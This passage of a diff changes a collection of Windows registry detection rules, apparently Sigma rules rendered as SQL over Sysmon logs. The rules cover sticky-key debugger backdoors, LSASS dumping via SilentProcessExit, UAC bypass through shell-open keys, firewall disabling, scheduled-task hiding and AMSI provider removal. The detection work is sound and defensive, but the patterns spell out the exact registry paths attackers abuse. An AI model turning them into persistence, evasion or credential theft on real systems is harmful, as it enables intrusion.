"registry_set_change_sysmon_driver_altitude.yml" + "filename": "registry_event_trust_record_modification.yml" }, { - "title": "Disabled RestrictedAdminMode For RDS", - "id": "d6ce7ebd-260b-4323-9768-a9631c8d4db2", - "status": "experimental", - "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", - "author": "frack113", + "title": "Leviathan Registry Key Activity", + "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", + "status": "test", + "description": "Detects registry key used by Leviathan APT in 
Malaysian focused campaign", + "author": "Aidan Bracher", "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "falsepositives": [ - "Unknown" + "attack.persistence", + "attack.t1547.001" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\DisableRestrictedAdmin' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" ], - "filename": "registry_set_lsa_disablerestrictedadmin.yml" + "filename": "registry_event_apt_leviathan.yml" }, { - "title": "Winlogon AllowMultipleTSSessions Enable", - "id": "f7997770-92c3-4ec9-b112-774c4ef96f96", + "title": "Sticky Key Like Backdoor Usage - Registry", + "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", "status": "experimental", - "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", + "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", "tags": [ + "attack.privilege_escalation", "attack.persistence", - "attack.defense_evasion", - "attack.t1112" + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ], "falsepositives": [ - "Legitimate use of the multi session functionality" + "Unlikely" ], - "level": "medium", + "level": 
"critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\AllowMultipleTSSessions' ESCAPE '\\' AND Details LIKE '%DWORD (0x00000001)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" ], - "filename": "registry_set_winlogon_allow_multiple_tssessions.yml" + "filename": "registry_event_stickykey_like_backdoor.yml" }, { - "title": "Disable Privacy Settings Experience in Registry", - "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", - "status": "experimental", - "description": "Detects registry modifications that disable 
Privacy Settings Experience", - "author": "frack113", + "title": "Suspicious Camera and Microphone Access", + "id": "62120148-6b7a-42be-8b91-271c04e281a3", + "status": "test", + "description": "Detects Processes accessing the camera and microphone from suspicious folder", + "author": "Den Iuzvyk", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.collection", + "attack.t1125", + "attack.t1123" ], "falsepositives": [ - "Legitimate admin script" + "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_privacy_settings_experience.yml" + "filename": "registry_event_susp_mic_cam_access.yml" }, { - "title": "Allow RDP Remote Assistance Feature", - "id": "37b437cf-3fc5-4c8e-9c94-1d7c9aff842b", - "status": "experimental", - "description": "Detect enable rdp feature to allow specific user to rdp connect on the targeted machine", - "author": 
"frack113", + "title": "RedMimicry Winnti Playbook Registry Manipulation", + "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "status": "test", + "description": "Detects actions caused by the RedMimicry Winnti playbook", + "author": "Alexander Rausch", "tags": [ "attack.defense_evasion", "attack.t1112" ], "falsepositives": [ - "Legitimate use of the feature (alerts should be investigated either way)" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\fAllowToGetHelp' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" ], - "filename": "registry_set_allow_rdp_remote_assistance_feature.yml" + "filename": "registry_event_redmimicry_winnti_reg.yml" }, { - "title": "Suspicious Application Allowed Through Exploit Guard", - "id": "42205c73-75c8-4a63-9db1-e3782e06fda0", + "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", + "id": "55e29995-75e7-451a-bef0-6225e2f13597", "status": "experimental", - "description": "Detects applications being added to the \"allowed applications\" list of exploit guard in order to bypass controlled folder settings", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel 
= 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" ], - "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" + "filename": "registry_event_silentprocessexit_lsass.yml" }, { - "title": "Disable Windows Firewall by Registry", - "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", - "status": "experimental", - "description": "Detect set EnableFirewall to 0 to disable the windows firewall", - "author": "frack113", + "title": "Shell Open Registry Keys Manipulation", + "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "status": "test", + "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. 
UACMe 33 or 62)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1546.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND Details LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (Details = '(Empty)'))))" ], - "filename": "registry_set_disable_windows_firewall.yml" + "filename": "registry_event_shell_open_keys_manipulation.yml" }, { - "title": "Disable Microsoft Defender Firewall via Registry", - "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", + "title": "Esentutl Volume Shadow Copy Service Keys", + "id": "5aad0995-46ab-41bd-a9ff-724f41114971", "status": "test", - "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", - "author": "frack113", + "description": "Detects the volume shadow copy service initialization and processing via 
esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1562.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND Image LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" ], - "filename": "registry_set_disable_defender_firewall.yml" + "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" }, { - "title": "Office Autorun Keys Modification", - "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", - "status": "experimental", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "title": "Narrator's Feedback-Hub Persistence", + "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "status": "test", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", + "author": "Dmitriy Lifanov, oscd.community", "tags": [ "attack.persistence", "attack.t1547.001" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys 
for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_office.yml" + "filename": "registry_event_narrator_feedback_persistance.yml" }, { - "title": "Potential Persistence Via Mpnotify", - "id": "92772523-d9c1-4c93-9547-b0ca500baba3", + "title": "Folder Removed From Exploit Guard ProtectedFolders List - Registry", + "id": 
"272e55a4-9e6b-4211-acb6-78f51f0b1b40", "status": "experimental", - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "description": "Detects the removal of folders from the \"ProtectedFolders\" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + "Legitimate administrators removing applications (should always be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\mpnotify%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders%' ESCAPE '\\')" ], - "filename": "registry_set_persistence_mpnotify.yml" + "filename": "registry_delete_exploit_guard_protected_folders.yml" }, { - "title": "Custom File Open Handler Executes PowerShell", - "id": "7530b96f-ad8e-431d-a04d-ac85cc461fdc", + "title": "Removal Of Index Value to Hide Schedule Task - Registry", + "id": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", "status": "experimental", - "description": "Detects the abuse of custom file open handler, executing powershell", - "author": "CD_R0M_", + "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. 
Which effectively hides it from any tooling such as \"schtasks /query\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.t1562" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%shell\\\\open\\\\command\\\\%' ESCAPE '\\' AND Details LIKE '%powershell%' ESCAPE '\\' AND Details LIKE '%-command%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%Index%' ESCAPE '\\')" ], - "filename": "registry_set_custom_file_open_handler_powershell_execution.yml" + "filename": "registry_delete_schtasks_hide_task_via_index_value_removal.yml" }, { - "title": "Potential Persistence Via TypedPaths", - "id": "086ae989-9ca6-4fe7-895a-759c5544f247", - "status": "experimental", - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. 
Which might indicate persistence attempt", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Terminal Server Client Connection History Cleared - Registry", + "id": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", + "status": "test", + "description": "Detects the deletion of registry keys containing the MSTSC connection history", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.defense_evasion", + "attack.t1070", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\TypedPaths\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\explorer.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Default\\\\MRU%' ESCAPE '\\') OR (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\Microsoft\\\\Terminal Server Client\\\\Servers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_typed_paths.yml" + "filename": "registry_delete_mstsc_history_cleared.yml" }, { - "title": "Activate Suppression of Windows Security Center Notifications", - "id": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "title": "Removal Of SD Value to Hide Schedule Task - Registry", + "id": "acd74772-5f88-45c7-956b-6a7b36c294d2", "status": "experimental", - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "author": "frack113", + "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. 
This technique is used by Tarrask malware", + "author": "Sittikorn S", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\UX Configuration\\\\Notification\\_Suppress' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\%' ESCAPE '\\' AND TargetObject LIKE '%SD%' ESCAPE '\\')" ], - "filename": "registry_set_suppress_defender_notifications.yml" + "filename": "registry_delete_schtasks_hide_task_via_sd_value_removal.yml" }, { - "title": "System Scripts Autorun Keys Modification", - "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "title": "Removal of Potential COM Hijacking Registry Keys", + "id": "96f697b0-b499-4e5d-9908-a67bec11cdb6", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects any deletion of entries in \".*\\shell\\open\\command\" registry keys.\nThese registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - 
"Legitimate administrator sets up autorun keys for legitimate reason" + "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" + "SELECT * FROM logs WHERE ((EventID = '12' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'DeleteKey' AND TargetObject LIKE '%\\\\shell\\\\open\\\\command' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (Image LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Dropbox.%' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\Wireshark\\_uninstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\wireshark-capture-file\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Opera\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Opera\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\installer.exe' ESCAPE '\\') OR (Image LIKE '%peazip%' ESCAPE '\\' AND TargetObject LIKE '%\\\\PeaZip.%' ESCAPE '\\') OR (Image LIKE '%\\\\Everything.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Everything.%' ESCAPE '\\') OR 
(Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Java\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\installer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Classes\\\\WOW6432Node\\\\CLSID\\\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}%' ESCAPE '\\')))" ], - "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" + "filename": "registry_delete_removal_com_hijacking_registry_key.yml" }, { - "title": "PowerShell Logging Disabled Via Registry Key Tampering", - "id": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "status": "experimental", - "description": "Detects changes to the registry for the currently logged-in user. In order to disable PowerShell module logging, script block logging or transcription and script execution logging", + "title": "Removal Of AMSI Provider Registry Keys", + "id": "41d1058a-aea7-4952-9293-29eaaf516465", + "status": "test", + "description": "Detects the deletion of AMSI provider registry key entries in HKLM\\Software\\Microsoft\\AMSI. 
